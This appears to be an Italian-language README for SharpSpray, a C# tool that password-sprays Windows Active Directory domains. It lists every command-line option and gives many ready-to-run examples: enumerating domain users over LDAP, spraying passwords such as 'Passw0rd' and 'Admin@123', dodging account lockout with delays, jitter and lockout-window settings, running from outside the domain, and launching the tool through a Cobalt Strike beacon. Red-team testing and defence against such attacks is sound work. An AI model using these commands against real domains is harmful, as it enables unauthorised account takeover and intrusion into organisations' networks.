
Strumento di password spraying per Active Directory. Recupera automaticamente la lista degli utenti e evita potenziali blocchi.
SharpSpray è uno strumento di password spraying per domini Windows scritto in .NET C#.
SharpSpray è un porting in C# di DomainPasswordSpray con funzionalità aggiuntive e migliorate. Questo strumento utilizza il protocollo LDAP per comunicare con i servizi Active Directory del dominio.
> SharpSpray.exe --help
-v, --Verbose Mostra messaggi dettagliati.
-u (Opzionale) Percorso del file con l'elenco dei nomi utente.
Verrà recuperato automaticamente da Active Directory se non specificato.
-p Una singola password o un elenco separato da '|' che verrà utilizzato per eseguire lo spraying delle password.
-k, --pl (Opzionale) Percorso del file con l'elenco delle password.
-d (Opzionale) Specifica un nome di dominio.
-m Usa questa opzione se lo spraying avviene da un host al di fuori del contesto del dominio.
-q, --dc-ip Obbligatorio quando l'opzione 'm' OutsideDomain è selezionata.
-x Tenta di escludere gli account disabilitati
dall'elenco utenti (Non supportato con l'opzione -m)
-z Esclude gli account a 1 tentativo dal
blocco (Non supportato con l'opzione -m)
-f Filtro LDAP personalizzato per gli utenti, ad es. "(description=*admin*)"
-o File in cui scrivere i risultati.
-w Non fare affidamento sulle impostazioni della finestra di osservazione del blocco del dominio e usa questo valore specifico. (Default 32 minuti)
-s (Opzionale) Ritardo in secondi tra ogni tentativo di autenticazione.
-j (Opzionale) Jitter in secondi.
--Force Forza l'avvio senza chiedere conferma.
--get-users-list Ottiene l'elenco degli utenti del dominio da Active Directory.
--show-examples Ottiene l'elenco degli utenti del dominio da Active Directory.
--show-args Mostra gli argomenti della riga di comando.
--help Mostra questa schermata di aiuto.
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* Utilizzo in Cobalt Strike:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* Controllo dei job in Cobalt:
beacon> jobs
Il comando seguente recupera gli utenti del dominio e stampa l'elenco nella console.
SharpSpray.exe -x -z --get-users-list
-x: Esclude gli account disabilitati dall'elenco utenti.
-z: Esclude gli account a 1 tentativo dal blocco.
SharpSpray | Strumento di Password Spraying per Active Directory